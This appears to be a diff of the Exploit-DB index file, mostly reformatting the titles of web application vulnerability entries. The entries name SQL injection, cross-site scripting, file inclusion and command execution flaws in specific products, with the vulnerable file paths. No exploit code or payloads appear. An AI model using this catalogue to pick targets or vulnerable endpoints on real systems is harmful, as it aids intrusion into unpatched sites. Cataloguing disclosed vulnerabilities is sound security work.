Wintle",php,webapps,80 @@ -33273,7 +33274,7 @@ id,file,description,date,author,platform,type,port 32644,platforms/php/webapps/32644.txt,"Alienvault 4.5.0 - Authenticated SQL Injection (Metasploit)",2014-04-01,"Brandon Perry",php,webapps,443 32645,platforms/php/webapps/32645.txt,"TWiki 4.x - 'SEARCH' Remote Command Execution",2008-12-06,"Troy Bollinge",php,webapps,0 32646,platforms/php/webapps/32646.txt,"TWiki 4.x - 'URLPARAM' Cross-Site Scripting",2008-12-06,"Marc Schoenefeld",php,webapps,0 -32647,platforms/php/webapps/32647.txt,"PrestaShop 1.1 - 'admin/login.php?PATH_INFO' Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps,0 +32647,platforms/php/webapps/32647.txt,"PrestaShop 1.1 - '/admin/login.php?PATH_INFO' Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps,0 32648,platforms/php/webapps/32648.txt,"PrestaShop 1.1 - 'order.php?PATH_INFO' Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps,0 32649,platforms/php/webapps/32649.txt,"PHPepperShop 1.4 - 'index.php' URL Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps,0 32650,platforms/php/webapps/32650.txt,"PHPepperShop 1.4 - shop/kontakt.php URL Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps,0 @@ -33307,7 +33308,7 @@ id,file,description,date,author,platform,type,port 32698,platforms/php/webapps/32698.txt,"SolucionXpressPro - 'main.php' SQL Injection",2009-01-05,Ehsan_Hp200,php,webapps,0 32701,platforms/php/webapps/32701.txt,"WordPress Plugin XCloner 3.1.0 - Cross-Site Request Forgery",2014-04-04,"High-Tech Bridge SA",php,webapps,80 32703,platforms/ios/webapps/32703.txt,"Private Photo+Video 1.1 Pro iOS - Persistent Exploit",2014-04-05,Vulnerability-Lab,ios,webapps,0 -32708,platforms/jsp/webapps/32708.txt,"Plunet BusinessManager 4.1 - 'pagesUTF8/auftrag_allgemeinauftrag.jsp' Multiple Cross-Site Scripting Vulnerabilities",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0 +32708,platforms/jsp/webapps/32708.txt,"Plunet BusinessManager 4.1 - '/pagesUTF8/auftrag_allgemeinauftrag.jsp' Multiple Cross-Site Scripting Vulnerabilities",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0 32709,platforms/jsp/webapps/32709.txt,"Plunet BusinessManager 4.1 - pagesUTF8/Sys_DirAnzeige.jsp Pfad Parameter Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0 32710,platforms/jsp/webapps/32710.txt,"Plunet BusinessManager 4.1 - pagesUTF8/auftrag_job.jsp Pfad Parameter Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0 32713,platforms/php/webapps/32713.txt,"tadbook2 Module for XOOPS - 'open_book.php' SQL Injection",2009-01-07,stylextra,php,webapps,0 @@ -33322,7 +33323,7 @@ id,file,description,date,author,platform,type,port 32730,platforms/asp/webapps/32730.txt,"Active Bids - 'search' Cross-Site Scripting",2009-01-15,Pouya_Server,asp,webapps,0 32731,platforms/asp/webapps/32731.txt,"Active Bids - 'search' SQL Injection",2009-01-15,Pouya_Server,asp,webapps,0 32732,platforms/php/webapps/32732.txt,"Masir Camp 3.0 - 'SearchKeywords' SQL Injection",2009-01-15,Pouya_Server,php,webapps,0 -32733,platforms/php/webapps/32733.txt,"w3bcms - 'admin/index.php' SQL Injection",2009-01-15,Pouya_Server,php,webapps,0 +32733,platforms/php/webapps/32733.txt,"w3bcms - '/admin/index.php' SQL Injection",2009-01-15,Pouya_Server,php,webapps,0 32734,platforms/cgi/webapps/32734.txt,"LemonLDAP:NG 0.9.3.1 - User Enumeration Weakness / Cross-Site Scripting",2009-01-16,"clément Oudot",cgi,webapps,0 32735,platforms/asp/webapps/32735.txt,"Blog Manager - 'ItemID' SQL Injection",2009-01-16,Pouya_Server,asp,webapps,0 32736,platforms/asp/webapps/32736.txt,"Blog Manager - 'categoryId' Cross-Site Scripting",2009-01-16,Pouya_Server,asp,webapps,0 @@ -33359,8 +33360,8 @@ id,file,description,date,author,platform,type,port 32804,platforms/php/webapps/32804.txt,"lastRSS autoposting bot MOD 0.1.3 - 'phpbb_root_path' Remote File Inclusion",2009-02-20,Kacper,php,webapps,0 32806,platforms/php/webapps/32806.txt,"Blue Utopia - 'index.php' Local File Inclusion",2009-02-22,PLATEN,php,webapps,0 32807,platforms/php/webapps/32807.txt,"Joomla! / Mambo Component gigCalendar 1.0 - 'banddetails.php' SQL Injection",2009-02-23,"Salvatore Fresta",php,webapps,0 -32808,platforms/php/webapps/32808.txt,"Magento 1.2 - 'app/code/core/Mage/Admin/Model/Session.php?login['Username']' Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0 -32809,platforms/php/webapps/32809.txt,"Magento 1.2 - 'app/code/core/Mage/Adminhtml/controllers/IndexController.php?email' Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0 +32808,platforms/php/webapps/32808.txt,"Magento 1.2 - '/app/code/core/Mage/Admin/Model/Session.php?login['Username']' Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0 +32809,platforms/php/webapps/32809.txt,"Magento 1.2 - '/app/code/core/Mage/Adminhtml/controllers/IndexController.php?email' Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0 32810,platforms/php/webapps/32810.txt,"Magento 1.2 - downloader/index.php URL Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0 32814,platforms/php/webapps/32814.txt,"Sendy 1.1.9.1 - SQL Injection",2014-04-11,delme,php,webapps,0 32816,platforms/php/webapps/32816.txt,"Orooj CMS - 'news.php' SQL Injection",2009-02-25,Cru3l.b0y,php,webapps,0 @@ -33412,12 +33413,12 @@ id,file,description,date,author,platform,type,port 32897,platforms/java/webapps/32897.txt,"Cisco Subscriber Edge Services Manager - Cross-Site Scripting / HTML Injection",2009-04-09,"Usman Saeed",java,webapps,0 32898,platforms/asp/webapps/32898.txt,"Absolute Form Processor XE 1.5 - 'login.asp' SQL Injection",2009-04-09,"ThE g0bL!N",asp,webapps,0 32903,platforms/asp/webapps/32903.txt,"People-Trak - Login SQL Injection",2009-04-13,Mormoroth.net,asp,webapps,0 -32907,platforms/cgi/webapps/32907.txt,"Banshee 1.4.2 DAAP Extension - 'apps/web/vs_diag.cgi' Cross-Site Scripting",2009-04-13,"Anthony de Almeida Lopes",cgi,webapps,0 +32907,platforms/cgi/webapps/32907.txt,"Banshee 1.4.2 DAAP Extension - '/apps/web/vs_diag.cgi' Cross-Site Scripting",2009-04-13,"Anthony de Almeida Lopes",cgi,webapps,0 32908,platforms/multiple/webapps/32908.txt,"IBM Tivoli Continuous Data Protection for Files 3.1.4.0 - Cross-Site Scripting",2009-04-14,"Abdul-Aziz Hariri",multiple,webapps,0 32909,platforms/java/webapps/32909.txt,"Novell Teaming 1.0 - User Enumeration Weakness / Multiple Cross-Site Scripting Vulnerabilities",2009-04-15,"Michael Kirchner",java,webapps,0 -32910,platforms/php/webapps/32910.txt,"Phorum 5.2 - 'admin/badwords.php?curr' Cross-Site Scripting",2009-04-16,voodoo-labs,php,webapps,0 -32911,platforms/php/webapps/32911.txt,"Phorum 5.2 - 'admin/banlist.php?curr' Cross-Site Scripting",2009-04-16,voodoo-labs,php,webapps,0 -32912,platforms/php/webapps/32912.txt,"Phorum 5.2 - 'admin/users.php' Multiple Cross-Site Scripting Vulnerabilities",2009-04-16,voodoo-labs,php,webapps,0 +32910,platforms/php/webapps/32910.txt,"Phorum 5.2 - '/admin/badwords.php?curr' Cross-Site Scripting",2009-04-16,voodoo-labs,php,webapps,0 +32911,platforms/php/webapps/32911.txt,"Phorum 5.2 - '/admin/banlist.php?curr' Cross-Site Scripting",2009-04-16,voodoo-labs,php,webapps,0 +32912,platforms/php/webapps/32912.txt,"Phorum 5.2 - '/admin/users.php' Multiple Cross-Site Scripting Vulnerabilities",2009-04-16,voodoo-labs,php,webapps,0 32913,platforms/php/webapps/32913.txt,"Phorum 5.2 - 'versioncheck.php?upgrade_available' Cross-Site Scripting",2009-04-16,voodoo-labs,php,webapps,0 32914,platforms/php/webapps/32914.php,"Geeklog 1.5.2 - 'usersettings.php' SQL Injection",2009-04-16,Nine:Situations:Group::bookoo,php,webapps,0 32924,platforms/php/webapps/32924.txt,"RazorCMS 0.3RC2 - Multiple Vulnerabilities",2009-04-16,"Jeremi Gosney",php,webapps,0 @@ -33433,7 +33434,7 @@ id,file,description,date,author,platform,type,port 32940,platforms/java/webapps/32940.txt,"Sun Java System Delegated Administrator 6.x - HTTP Response Splitting",2009-04-21,"SCS team",java,webapps,0 32941,platforms/php/webapps/32941.txt,"PTCeffect 4.6 - Local File Inclusion / SQL Injection",2014-04-19,"walid naceri",php,webapps,0 32943,platforms/hardware/webapps/32943.txt,"Teracom Modem T2-B-Gawv1.4U10Y-BI - Cross-Site Request Forgery",2014-04-20,"Rakesh S",hardware,webapps,0 -32948,platforms/php/webapps/32948.txt,"New5starRating 1.0 - 'admin/control_panel_sample.php' SQL Injection",2009-04-22,zer0day,php,webapps,0 +32948,platforms/php/webapps/32948.txt,"New5starRating 1.0 - '/admin/control_panel_sample.php' SQL Injection",2009-04-22,zer0day,php,webapps,0 32950,platforms/php/webapps/32950.txt,"Flat Calendar 1.1 - 'add.php' HTML Injection",2009-04-22,ZoRLu,php,webapps,0 32952,platforms/php/webapps/32952.txt,"CS Whois Lookup - 'ip' Remote Command Execution",2009-04-23,SirGod,php,webapps,0 32953,platforms/asp/webapps/32953.vbs,"PuterJam's Blog PJBlog3 3.0.6 - 'action.asp' SQL Injection",2009-04-24,anonymous,asp,webapps,0 @@ -33452,7 +33453,7 @@ id,file,description,date,author,platform,type,port 32988,platforms/php/webapps/32988.txt,"VerliAdmin 0.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-05-05,TEAMELITE,php,webapps,0 32989,platforms/php/webapps/32989.txt,"Verlihub Control Panel 1.7 - Multiple Cross-Site Scripting Vulnerabilities",2009-05-06,TEAMELITE,php,webapps,0 32990,platforms/hardware/webapps/32990.pl,"HP Laser Jet - JavaScript Persistent Cross-Site Scripting via PJL Directory Traversal",2014-04-23,@0x00string,hardware,webapps,0 -32991,platforms/php/webapps/32991.txt,"Claroline 1.8.11 - 'claroline/linker/notfound.php' Cross-Site Scripting",2009-05-08,"Gerendi Sandor Attila",php,webapps,0 +32991,platforms/php/webapps/32991.txt,"Claroline 1.8.11 - '/claroline/linker/notfound.php' Cross-Site Scripting",2009-05-08,"Gerendi Sandor Attila",php,webapps,0 32992,platforms/php/webapps/32992.txt,"MagpieRSS 0.72 - Cross-Site Scripting / HTML Injection",2009-05-08,"Justin Klein Keane",php,webapps,0 32993,platforms/php/webapps/32993.txt,"Dacio's Image Gallery 1.6 - Multiple Remote Vulnerabilities",2009-05-11,ahmadbady,php,webapps,0 32999,platforms/php/webapps/32999.py,"Bonefire 0.7.1 - Reinstall Admin Account Exploit",2014-04-24,"Mehmet Ince",php,webapps,0 @@ -33466,7 +33467,7 @@ id,file,description,date,author,platform,type,port 33006,platforms/php/webapps/33006.txt,"Alienvault 4.3.1 - Unauthenticated SQL Injection / Cross-Site Scripting",2014-04-24,"Sasha Zivojinovic",php,webapps,443 33008,platforms/php/webapps/33008.txt,"LxBlog - Multiple Cross-Site Scripting / SQL Injections",2009-05-22,Securitylab.ir,php,webapps,0 33009,platforms/asp/webapps/33009.txt,"DotNetNuke 4.9.3 - 'ErrorPage.aspx' Cross-Site Scripting",2009-05-22,"ben hawkes",asp,webapps,0 -33011,platforms/php/webapps/33011.txt,"PHP-Nuke 8.0 - 'main/tracking/userLog.php' SQL Injection",2009-05-27,"Gerendi Sandor Attila",php,webapps,0 +33011,platforms/php/webapps/33011.txt,"PHP-Nuke 8.0 - '/main/tracking/userLog.php' SQL Injection",2009-05-27,"Gerendi Sandor Attila",php,webapps,0 33013,platforms/php/webapps/33013.txt,"Lussumo Vanilla 1.1.5/1.1.7 - 'updatecheck.php' Cross-Site Scripting",2009-05-15,"Gerendi Sandor Attila",php,webapps,0 33014,platforms/php/webapps/33014.txt,"Achievo 1.3.4 - Multiple Cross-Site Scripting Vulnerabilities",2009-05-28,MaXe,php,webapps,0 33019,platforms/multiple/webapps/33019.txt,"miSecureMessages 4.0.1 - Session Management / Authentication Bypass",2014-04-25,"Jared Bird",multiple,webapps,0 @@ -33542,7 +33543,7 @@ id,file,description,date,author,platform,type,port 33168,platforms/cfm/webapps/33168.txt,"Adobe ColdFusion Server 8.0.1 - administrator/logviewer/searchlog.cfm startRow Parameter Cross-Site Scripting",2009-08-17,"Alexander Polyakov",cfm,webapps,0 33169,platforms/cfm/webapps/33169.txt,"Adobe ColdFusion Server 8.0.1 - wizards/common/_logintowizard.cfm Query String Cross-Site Scripting",2009-08-17,"Alexander Polyakov",cfm,webapps,0 33170,platforms/cfm/webapps/33170.txt,"Adobe ColdFusion Server 8.0.1 - administrator/enter.cfm Query String Cross-Site Scripting",2009-08-17,"Alexander Polyakov",cfm,webapps,0 -33171,platforms/asp/webapps/33171.txt,"DUWare DUgallery 3.0 - 'admin/edit.asp' Authentication Bypass",2009-08-17,spymeta,asp,webapps,0 +33171,platforms/asp/webapps/33171.txt,"DUWare DUgallery 3.0 - '/admin/edit.asp' Authentication Bypass",2009-08-17,spymeta,asp,webapps,0 33178,platforms/php/webapps/33178.txt,"Computer Associates SiteMinder - '%00' Cross-Site Scripting Protection Security Bypass",2009-06-08,"Arshan Dabirsiaghi",php,webapps,0 33254,platforms/java/webapps/33254.txt,"IBM Lotus Connections 2.0.1 - 'simpleSearch.do' Cross-Site Scripting",2009-09-23,IBM,java,webapps,0 40346,platforms/multiple/webapps/40346.py,"Adobe ColdFusion < 11 Update 10 - XML External Entity Injection",2016-09-07,"Dawid Golunski",multiple,webapps,0 @@ -33595,7 +33596,7 @@ id,file,description,date,author,platform,type,port 33590,platforms/php/webapps/33590.txt,"Joomla! Component AutartiTarot - Directory Traversal",2010-02-01,B-HUNT3|2,php,webapps,0 33342,platforms/php/webapps/33342.txt,"CuteNews 1.4.6 - 'search.php' Multiple Cross-Site Scripting Vulnerabilities",2009-11-10,"Andrew Horton",php,webapps,0 33281,platforms/php/webapps/33281.txt,"Achievo 1.x - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2009-10-13,"Ryan Dewhurst",php,webapps,0 -33282,platforms/php/webapps/33282.txt,"Dream Poll 3.1 - 'index.php' Cross-Site Scripting / SQL Injection",2009-10-13,infosecstuff,php,webapps,0 +33282,platforms/php/webapps/33282.txt,"Dream Poll 3.1 - '/index.php' Cross-Site Scripting / SQL Injection",2009-10-13,infosecstuff,php,webapps,0 33284,platforms/multiple/webapps/33284.txt,"Pentaho BI 1.x - Multiple Cross-Site Scripting / Information Disclosure Vulnerabilities",2009-10-14,euronymous,multiple,webapps,0 33317,platforms/php/webapps/33317.txt,"Alienvault Open Source SIEM (OSSIM) 4.6.1 - Authenticated SQL Injection (Metasploit)",2014-05-12,"Chris Hebert",php,webapps,443 33286,platforms/java/webapps/33286.txt,"Eclipse BIRT 2.2.1 - 'run?__report' Cross-Site Scripting",2009-10-14,"Michele Orru",java,webapps,0 @@ -33610,13 +33611,13 @@ id,file,description,date,author,platform,type,port 33296,platforms/php/webapps/33296.txt,"OpenDocMan 1.2.5 - 'toBePublished.php' Multiple Cross-Site Scripting Vulnerabilities",2009-10-21,"Amol Naik",php,webapps,0 33297,platforms/php/webapps/33297.txt,"OpenDocMan 1.2.5 - 'index.php' last_message Parameter Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 33298,platforms/php/webapps/33298.txt,"OpenDocMan 1.2.5 - 'admin.php?last_message' Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 -33299,platforms/php/webapps/33299.txt,"OpenDocMan 1.2.5 - category.php Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 -33300,platforms/php/webapps/33300.txt,"OpenDocMan 1.2.5 - department.php Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 -33301,platforms/php/webapps/33301.txt,"OpenDocMan 1.2.5 - profile.php Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 -33302,platforms/php/webapps/33302.txt,"OpenDocMan 1.2.5 - rejects.php Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 -33303,platforms/php/webapps/33303.txt,"OpenDocMan 1.2.5 - search.php Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 -33304,platforms/php/webapps/33304.txt,"OpenDocMan 1.2.5 - user.php Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 -33305,platforms/php/webapps/33305.txt,"OpenDocMan 1.2.5 - view_file.php Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 +33299,platforms/php/webapps/33299.txt,"OpenDocMan 1.2.5 - 'category.php' Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 +33300,platforms/php/webapps/33300.txt,"OpenDocMan 1.2.5 - 'department.php' Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 +33301,platforms/php/webapps/33301.txt,"OpenDocMan 1.2.5 - 'profile.php' Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 +33302,platforms/php/webapps/33302.txt,"OpenDocMan 1.2.5 - 'rejects.php' Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 +33303,platforms/php/webapps/33303.txt,"OpenDocMan 1.2.5 - 'search.php' Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 +33304,platforms/php/webapps/33304.txt,"OpenDocMan 1.2.5 - 'user.php' Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 +33305,platforms/php/webapps/33305.txt,"OpenDocMan 1.2.5 - 'view_file.php' Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 33307,platforms/php/webapps/33307.php,"RunCMS - 'forum' SQL Injection",2009-10-26,Nine:Situations:Group::bookoo,php,webapps,0 33308,platforms/php/webapps/33308.txt,"Sahana 0.6.2 - 'mod' Local File Disclosure",2009-10-27,"Greg Miernicki",php,webapps,0 33309,platforms/php/webapps/33309.txt,"TFTgallery 0.13 - 'album' Cross-Site Scripting",2009-10-26,blake,php,webapps,0 @@ -33632,7 +33633,7 @@ id,file,description,date,author,platform,type,port 33357,platforms/php/webapps/33357.txt,"PHD Help Desk 1.43 - 'atributo.php?URL' Cross-Site Scripting",2009-11-16,"Amol Naik",php,webapps,0 33358,platforms/php/webapps/33358.txt,"PHD Help Desk 1.43 - 'atributo_list.php' Multiple Cross-Site Scripting Vulnerabilities",2009-11-16,"Amol Naik",php,webapps,0 33359,platforms/php/webapps/33359.txt,"PHD Help Desk 1.43 - 'caso_insert.php?URL' Cross-Site Scripting",2009-11-16,"Amol Naik",php,webapps,0 -33361,platforms/asp/webapps/33361.txt,"JiRo's (Multiple Products) - 'files/login.asp' Multiple SQL Injections",2009-11-17,blackenedsecurity,asp,webapps,0 +33361,platforms/asp/webapps/33361.txt,"JiRo's (Multiple Products) - '/files/login.asp' Multiple SQL Injections",2009-11-17,blackenedsecurity,asp,webapps,0 33362,platforms/php/webapps/33362.txt,"CubeCart 3.0.4/4.3.6 - 'ProductID' SQL Injection",2009-11-19,"Sangte Amtham",php,webapps,0 33365,platforms/php/webapps/33365.txt,"WordPress Plugin WP-phpList 2.10.2 - 'unsubscribeemail' Cross-Site Scripting",2009-11-29,MustLive,php,webapps,0 40345,platforms/php/webapps/40345.txt,"FreePBX 13.0.x < 13.0.154 - Unauthenticated Remote Command Execution",2016-09-07,i-Hmx,php,webapps,0 @@ -33668,7 +33669,7 @@ id,file,description,date,author,platform,type,port 33439,platforms/php/webapps/33439.txt,"MyBB 1.4.10 - 'myps.php' Cross-Site Scripting",2009-12-24,"Steven Abbagnaro",php,webapps,0 33440,platforms/php/webapps/33440.txt,"Joomla! Component iF Portfolio Nexus - 'Controller' Remote File Inclusion",2009-12-29,F10riX,php,webapps,0 33441,platforms/php/webapps/33441.txt,"Joomla! Component Joomulus 2.0 - 'tagcloud.swf' Cross-Site Scripting",2009-12-28,MustLive,php,webapps,0 -33442,platforms/php/webapps/33442.txt,"FreePBX 2.5.2 - 'admin/config.php?tech' Cross-Site Scripting",2009-12-28,Global-Evolution,php,webapps,0 +33442,platforms/php/webapps/33442.txt,"FreePBX 2.5.2 - '/admin/config.php?tech' Cross-Site Scripting",2009-12-28,Global-Evolution,php,webapps,0 33443,platforms/php/webapps/33443.txt,"FreePBX 2.5.2 - Zap Channel Addition Description Parameter Cross-Site Scripting",2009-12-28,Global-Evolution,php,webapps,0 33445,platforms/php/webapps/33445.txt,"PHPInstantGallery 1.1 - 'admin.php' Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 33446,platforms/php/webapps/33446.txt,"Barbo91 - 'upload.php' Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 @@ -33690,7 +33691,7 @@ id,file,description,date,author,platform,type,port 33464,platforms/php/webapps/33464.txt,"Discuz! 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-03,indoushka,php,webapps,0 33465,platforms/php/webapps/33465.txt,"SLAED CMS 2.0 - 'stop' Cross-Site Scripting",2010-01-03,indoushka,php,webapps,0 33466,platforms/php/webapps/33466.txt,"pL-PHP 0.9 - 'index.php' Cross-Site Scripting",2010-01-04,indoushka,php,webapps,0 -33467,platforms/php/webapps/33467.txt,"WMNews - 'admin/wmnews.php' Cross-Site Scripting",2010-01-04,indoushka,php,webapps,0 +33467,platforms/php/webapps/33467.txt,"WMNews - '/admin/wmnews.php' Cross-Site Scripting",2010-01-04,indoushka,php,webapps,0 33468,platforms/php/webapps/33468.txt,"MercuryBoard 1.1.5 - 'index.php' Cross-Site Scripting",2010-01-04,indoushka,php,webapps,0 33469,platforms/php/webapps/33469.txt,"LXR 0.9.x - Cross Referencer Multiple Cross-Site Scripting Vulnerabilities",2010-01-05,"Dan Rosenberg",php,webapps,0 33470,platforms/php/webapps/33470.txt,"LineWeb 1.0.5 - Multiple Remote Vulnerabilities",2010-01-05,"Ignacio Garrido",php,webapps,0 @@ -33717,7 +33718,7 @@ id,file,description,date,author,platform,type,port 33518,platforms/hardware/webapps/33518.txt,"ZYXEL P-660HW-T1 3 Wireless Router - Cross-Site Request Forgery",2014-05-26,"Mustafa ALTINKAYNAK",hardware,webapps,80 33520,platforms/hardware/webapps/33520.txt,"D-Link Routers - Multiple Vulnerabilities",2014-05-26,"Kyle Lovett",hardware,webapps,80 33574,platforms/php/webapps/33574.txt,"Discuz! 6.0 - 'tid' Cross-Site Scripting",2010-01-27,s4r4d0,php,webapps,0 -33575,platforms/cfm/webapps/33575.txt,"CommonSpot Server - 'utilities/longproc.cfm' Cross-Site Scripting",2010-01-28,"Richard Brain",cfm,webapps,0 +33575,platforms/cfm/webapps/33575.txt,"CommonSpot Server - '/utilities/longproc.cfm' Cross-Site Scripting",2010-01-28,"Richard Brain",cfm,webapps,0 33526,platforms/php/webapps/33526.txt,"Technology for Solutions 1.0 - 'id' Cross-Site Scripting",2010-01-14,PaL-D3v1L,php,webapps,0 33528,platforms/php/webapps/33528.txt,"Xforum 1.4 - 'nbpageliste' Cross-Site Scripting",2010-01-14,ViRuSMaN,php,webapps,0 33529,platforms/php/webapps/33529.txt,"Joomla! Component com_marketplace 1.2 - 'catid' Cross-Site Scripting",2010-01-14,ViRuSMaN,php,webapps,0 @@ -33728,10 +33729,10 @@ id,file,description,date,author,platform,type,port 33638,platforms/php/webapps/33638.txt,"Joomla! Component Webee Comments 1.1/1.2 - Multiple BBCode Tags Cross-Site Scripting Vulnerabilities",2009-11-15,"Jeff Channell",php,webapps,0 33639,platforms/php/webapps/33639.txt,"Joomla! Component EasyBook 2.0.0rc4 - Multiple HTML Injection Vulnerabilities",2009-09-17,"Jeff Channell",php,webapps,0 33634,platforms/php/webapps/33634.txt,"CommodityRentals CD Rental Software - 'index.php' SQL Injection",2010-02-11,"Don Tukulesto",php,webapps,0 -33541,platforms/php/webapps/33541.txt,"DataLife Engine 8.3 - 'engine/inc/include/init.php?selected_language' Remote File Inclusion",2010-01-19,indoushka,php,webapps,0 -33542,platforms/php/webapps/33542.txt,"DataLife Engine 8.3 - 'engine/inc/help.php?config[langs]' Remote File Inclusion",2010-01-19,indoushka,php,webapps,0 -33543,platforms/php/webapps/33543.txt,"DataLife Engine 8.3 - 'engine/ajax/pm.php?config[lang]' Remote File Inclusion",2010-01-19,indoushka,php,webapps,0 -33544,platforms/php/webapps/33544.txt,"DataLife Engine 8.3 - 'engine/ajax/addcomments.php?_REQUEST[skin]' Remote File Inclusion",2010-01-19,indoushka,php,webapps,0 +33541,platforms/php/webapps/33541.txt,"DataLife Engine 8.3 - '/engine/inc/include/init.php?selected_language' Remote File Inclusion",2010-01-19,indoushka,php,webapps,0 +33542,platforms/php/webapps/33542.txt,"DataLife Engine 8.3 - '/engine/inc/help.php?config[langs]' Remote File Inclusion",2010-01-19,indoushka,php,webapps,0 +33543,platforms/php/webapps/33543.txt,"DataLife Engine 8.3 - '/engine/ajax/pm.php?config[lang]' Remote File Inclusion",2010-01-19,indoushka,php,webapps,0 +33544,platforms/php/webapps/33544.txt,"DataLife Engine 8.3 - '/engine/ajax/addcomments.php?_REQUEST[skin]' Remote File Inclusion",2010-01-19,indoushka,php,webapps,0 33545,platforms/php/webapps/33545.txt,"Easysitenetwork Jokes Complete Website - 'id' Cross-Site Scripting",2010-01-18,indoushka,php,webapps,0 33546,platforms/php/webapps/33546.txt,"Easysitenetwork Jokes Complete Website - 'searchingred' Cross-Site Scripting",2010-01-18,indoushka,php,webapps,0 33547,platforms/php/webapps/33547.pl,"vBulletin 4.0.1 - 'misc.php' SQL Injection",2010-01-18,indoushka,php,webapps,0 @@ -33812,7 +33813,7 @@ id,file,description,date,author,platform,type,port 33720,platforms/asp/webapps/33720.txt,"Pre E-Learning Portal - 'search_result.asp' SQL Injection",2010-03-08,NoGe,asp,webapps,0 33721,platforms/asp/webapps/33721.txt,"Max Network Technology BBSMAX 4.2 - 'post.aspx' Cross-Site Scripting",2010-03-08,Liscker,asp,webapps,0 33722,platforms/asp/webapps/33722.txt,"ASPCode CMS 1.5.8 - 'default.asp' Multiple Cross-Site Scripting Vulnerabilities",2010-03-08,"Alberto Fontanella",asp,webapps,0 -33723,platforms/php/webapps/33723.html,"KDPics 1.18 - 'admin/index.php' Authentication Bypass",2010-03-08,snakespc,php,webapps,0 +33723,platforms/php/webapps/33723.html,"KDPics 1.18 - '/admin/index.php' Authentication Bypass",2010-03-08,snakespc,php,webapps,0 33724,platforms/php/webapps/33724.txt,"OpenCart 1.3.2 - 'page' SQL Injection",2010-03-07,"Andrés Gómez",php,webapps,0 33726,platforms/php/webapps/33726.txt,"TikiWik < 4.2 - Multiple Vulnerabilities",2010-03-09,"Mateusz Drygas",php,webapps,0 33727,platforms/php/webapps/33727.txt,"wh-em.com upload 7.0 - Insecure Cookie Authentication Bypass",2010-02-16,indoushka,php,webapps,0 @@ -33835,7 +33836,7 @@ id,file,description,date,author,platform,type,port 40351,platforms/php/webapps/40351.txt,"Jobberbase 2.0 - Multiple Vulnerabilities",2016-09-08,"Ross Marks",php,webapps,80 33756,platforms/php/webapps/33756.txt,"Joomla! Component com_seek - 'id' SQL Injection",2010-03-13,"DevilZ TM",php,webapps,0 33757,platforms/php/webapps/33757.txt,"Joomla! Component com_d-greinar - 'maintree' Cross-Site Scripting",2010-03-13,"DevilZ TM",php,webapps,0 -33758,platforms/asp/webapps/33758.txt,"Zigurrat Farsi CMS - 'manager/textbox.asp' SQL Injection",2010-03-15,Isfahan,asp,webapps,0 +33758,platforms/asp/webapps/33758.txt,"Zigurrat Farsi CMS - '/manager/textbox.asp' SQL Injection",2010-03-15,Isfahan,asp,webapps,0 33762,platforms/php/webapps/33762.txt,"Andromeda 1.9.2 - 's' Cross-Site Scripting / Session Fixation",2010-03-15,indoushka,php,webapps,0 33763,platforms/php/webapps/33763.txt,"Domain Verkaus & Auktions Portal - 'index.php' SQL Injection",2010-03-15,"Easy Laster",php,webapps,0 33764,platforms/multiple/webapps/33764.txt,"Dojo Toolkit 1.4.1 - dijit\tests\_testCommon.js theme Parameter Cross-Site Scripting",2010-03-15,"Adam Bixby",multiple,webapps,0 @@ -33846,7 +33847,7 @@ id,file,description,date,author,platform,type,port 33771,platforms/php/webapps/33771.txt,"Joomla! Component com_alert - 'q_item' SQL Injection",2010-03-17,N2n-Hacker,php,webapps,0 33772,platforms/php/webapps/33772.txt,"PHPBB2 Plus 1.53 - 'kb.php' SQL Injection",2010-03-17,Gamoscu,php,webapps,0 33773,platforms/php/webapps/33773.txt,"tenfourzero.net Shutter 0.1.4 - 'admin.html' Multiple SQL Injections",2010-03-18,blake,php,webapps,0 -33776,platforms/php/webapps/33776.txt,"Kempt SiteDone 2.0 - 'detail.php' Cross-Site Scripting / SQL Injection",2010-03-18,d3v1l,php,webapps,0 +33776,platforms/php/webapps/33776.txt,"Kempt SiteDone 2.0 - '/detail.php' Cross-Site Scripting / SQL Injection",2010-03-18,d3v1l,php,webapps,0 33777,platforms/php/webapps/33777.txt,"PHPWind 6.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-03-19,Liscker,php,webapps,0 33779,platforms/jsp/webapps/33779.txt,"agXchange ESM - 'ucschcancelproc.jsp' Open redirection",2010-03-22,Lament,jsp,webapps,0 33781,platforms/php/webapps/33781.txt,"Lussumo Vanilla 1.1.10 - 'definitions.php' Multiple Remote File Inclusions",2010-03-23,eidelweiss,php,webapps,0 